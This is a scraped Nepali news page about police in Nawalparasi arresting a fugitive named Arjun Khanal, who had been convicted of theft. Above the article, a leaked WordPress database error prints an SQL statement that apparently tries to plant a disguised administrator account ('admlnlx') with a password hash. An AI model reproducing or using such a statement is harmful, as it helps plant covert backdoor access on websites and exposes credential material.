WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B337YjvsRoVOXiwaw6/pCNDhifedbd1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 15:01:21', '', 'admlnlx', 'admlnlx')
नवलपरासी,पुस २ –
चार वर्षअघि जिल्ला अदालतबाट कैद सजाय फैसला भई फरार अपराधीलाई प्रहरीले शुक्रबार पक्राउ गरेको छ ।
विसं २०६९ जेठ ३० गते चोरी मुद्दामा चार वर्ष एक महिना १५ दिन कैद फैसला भई फरार रहेका नवलपरासी कावासोती–५ बस्ने ३५ वर्षीय अर्जुन खनाललाई प्रहरीले पक्राउ गरी जिल्ला अदालत नवलपरासीमा उपस्थित गराएर जिल्ला कारागारमा चलान गरेको इलाका प्रहरी कार्यालय कावासोतीले जनाएको छ ।